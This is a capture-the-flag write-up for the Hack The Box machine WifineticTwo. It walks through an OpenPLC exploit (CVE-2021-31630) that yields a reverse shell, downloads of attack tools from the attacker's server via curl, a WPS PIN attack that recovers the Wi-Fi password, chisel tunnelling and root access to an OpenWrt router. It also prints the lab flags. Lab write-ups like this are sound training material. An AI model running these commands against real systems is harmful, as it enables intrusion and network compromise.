HTB • CTF • WifineticTwo • Write-Up

HTB • CTF • WifineticTwo • Write-Up

Published: at 09:29 AM

Table of contents

Open Table of contents

INFO

CTF URL: https://app.hackthebox.com/machines/WifineticTwo

IP: 10.10.11.7

Difficulty: Medium

Reconaisance

NMAP

nmap -p- 10.10.11.7 -v --min-rate 10000
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

nmap -p22,8080 -sS -sC -sV 10.10.11.7 -v
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
| http-title: Site doesnt have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 232
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqEziQ.wmxVSOxwnjs3ZtAXf2Vq_ftaz0U; Expires=Wed, 24-Jul-2024 17:07:01 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 24 Jul 2024 17:02:01 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 302 FOUND
|     content-type: text/html; charset=utf-8
|     content-length: 219
|     location: http://0.0.0.0:8080/login
|     vary: Cookie
|     set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZqEzhQ.qaGXsfQfAQlqoN1VIeqiTRO5Fcg; Expires=Wed, 24-Jul-2024 17:06:57 GMT; HttpOnly; Path=/
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 24 Jul 2024 17:01:57 GMT
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     content-type: text/html; charset=utf-8
|     allow: HEAD, OPTIONS, GET
|     vary: Cookie
|     set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZqEzhg.6RcKQsx22Sio95_sfLB_PzY4D3Q; Expires=Wed, 24-Jul-2024 17:06:58 GMT; HttpOnly; Path=/
|     content-length: 0
|     server: Werkzeug/1.0.1 Python/2.7.18
|     date: Wed, 24 Jul 2024 17:01:58 GMT
|   RTSPRequest: 
|     HTTP/1.1 400 Bad request
|     content-length: 90
|     cache-control: no-cache
|     content-type: text/html
|     connection: close
|     <html><body><h1>400 Bad request</h1>
|     Your browser sent an invalid request.
|_    </body></html>

WEB - 8080

Openplc

exploit

git clone https://github.com/mind2hex/CVE-2021-31630
cd CVE-2021-31630
python3 exploit.py --ip 10.10.14.43 --port 1234 -U openplc -P openplc --target http://10.10.11.7:8080/         
=======================
[1]      Target: http://10.10.11.7:8080/
[2] Credentials: openplc:openplc
[3] Addr for rev shell: 10.10.14.43:1234
=======================


[!] Trying to log in with credentials openplc:openplc
[!] Successful login
[!] Session Cookie: session=.eJw9jzFvgzAUhP9K5bkDEFiQOiCZWAzvWUFG1vMStYkbYjBFJFGoo_z3uh063HS6--4ebP-52EvPyutys69sfz6y8sFePljJSKGXus5BmBHCdiDdpSC6zOi2B7FbgXcBQ5Wggw0qyKVoz6QpgG6SmBkonFYpmgJ4lSHvMvLoybU9CkjIocNwSJGPXqp-MHxIScFd6t2vMuOaAnmVx-575Gyitxq-jVxYUVCB6lQYVX9LVaeR_caecftsF_8-2en6_-Z2scvfJfY122keD-z5Awe5TyA.ZqE1uQ.2m0NL2rjLAJs1jIgyJTvIu6nfDw
[!] Sending payload to: http://10.10.11.7:8080//upload-program
[!] Sending payload to: http://10.10.11.7:8080//hardware 
[!] Program compilation in curse. http://10.10.11.7:8080/compile-program?file=151903.st
[!] Program compiled successfully...
[!] Starting plc. Check your listener...

got the shell

nc -lvnp 1234 
listening on [any] 1234 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.11.7] 48652

whoami
root

shell stabilization

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

user.txt

cd
cat user.txt
f29b9e1c659db3628f2718117c55bc7e

Wireless

ENUM

As name suggests, it may mean that we need to exploit Wirelessly.

ifconfig 

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.4  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fe79:d1d2  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:79:d1:d2  txqueuelen 1000  (Ethernet)
        RX packets 197806  bytes 16958107 (16.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 145191  bytes 15152251 (15.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10  bytes 576 (576.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 576 (576.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:04:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0 - an interface for Wireless Network.

In order to scan available networks for attack:

init wpa_supplicant

vim /etc/wpa_supplicant/wpa_supplicant.conf
# add
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

start

wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf

get into interactive mode of wpa_cli

wpa_cli
> scan
# after some time
> scan_results
bssid / frequency / signal level / flags / ssid
02:00:00:00:01:00       2412    -30     [WPA2-PSK-CCMP][WPS][ESS]       plcrouter

There is a WiFi with WPS enabled!

Note: if there are some errors with wpa_cli or wpa_supplicant, you may need to stop wpa_supplicant service, and start the steps again.

WPS Attack

switch the interface to monitor mode

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

reaver (not working)

Now lets attack, but first we need to transfer tools onto victim machine. I did it in the following way:

# copy binary to a location
cp /usr/bin/reaver .  
cp /usr/lib/x86_64-linux-gnu/libpcap.so.0.8 . # reaver needs it
# setup a python server
python3 -m http.server
# transfer onto victim 
curl http://10.10.14.43:8000/reaver > reaver
curl http://10.10.14.43:8000/libpcap.so.0.8 > /usr/lib/x86_64-linux-gnu/libpcap.so.0.8
chmod +x reaver

then attack

./reaver --bssid 02:00:00:00:01:00 --interface wlan0 -v --no-associate

Idk why, but it does not work in this machine. :(

bully (not working)

# copy binary to a location
cp /usr/bin/bully . 
cp /usr/lib/x86_64-linux-gnu/liblua5.3.so.0 .
# setup a python server
python3 -m http.server
# transfer onto victim 
curl http://10.10.14.43:8000/bully > bully
curl http://10.10.14.43:8000/liblua5.3.so.0 > /usr/lib/x86_64-linux-gnu/liblua5.3.so.0

then attack

./bully -b 02:00:00:00:01:00 wlan0

Idk why, but it does not work in this machine, either. :(((

oneshot

# transfer by copying python code, and then attack
python3 oneshot.py -i wlan0 --bssid 02:00:00:00:01:00
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'

Connect to the WiFi

vim /etc/wpa_supplicant/wpa_supplicant.conf
# add
network={
    ssid="plcrouter"
    psk="NoWWEDoKnowWhaTisReal123!"
}

(stop and then) start wpa_supplicant

pkill wpa_supplicant
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
# get ip
# dhclient wlan0 - it will not work, you cannot then connect to the machine
ifconfig wlan0 192.168.1.150 netmask 255.255.255.0 up

Scanning the Network

for ip in 192.168.1.{1..255}; do
  (
    ping -c 1 -W 1 $ip > /dev/null
    if [ $? -eq 0 ]; then
      echo "${ip} is up"
    fi
  ) &
done
wait

The result:

192.168.1.1 is up
192.168.1.150 is up

Let’s scan ports with:

./spookyscan.sh -i 192.168.1.1 -p 1024
# result
192.168.1.1:22 is open
192.168.1.1:53 is open
192.168.1.1:80 is open
192.168.1.1:443 is open

I need to forward them to the attack machine.

Port Forwarding

I gonna use chisel.

# download it both on victim and attack machine
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz

# on attack machine
## config is the following
cat /etc/proxychains4.conf 
...
socks5  127.0.0.1 1080
# then run this
./chisel_1.9.1_linux_amd64 server -p 2200 --reverse
# on victim machine
./chisel_1.9.1_linux_amd64 client 10.10.14.44:2200 R:socks

Check the connection:

proxychains4 curl http://192.168.1.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.1.1:80  ...  OK
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
        <head>
                <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
                <meta http-equiv="Pragma" content="no-cache" />
                <meta http-equiv="Expires" content="0" />
                <meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
                <style type="text/css">
                        body { background: white; font-family: arial, helvetica, sans-serif; }
                        a { color: black; }

                        @media (prefers-color-scheme: dark) {
                                body { background: black; }
                                a { color: white; }
                        }
                </style>
        </head>
        <body>
                <a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
        </body>
</html>

It means everything is ok

Attacking the router

Web

Ports: 80 and 443 To open the page in firefox

proxychains4 firefox

webpage

it opens an interface of the router: ap LuCI

SSH Login and root.txt

I checked settings of the router and found the following:

Added a password for root and ssh-ed to the system:

root@attica04:~# ssh [email protected]
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.
[email protected]'s password: 


BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
root@ap:~# ls
root.txt
root@ap:~# cat root.txt
aff8e5810c3c00f297d342c819e39ee6

Result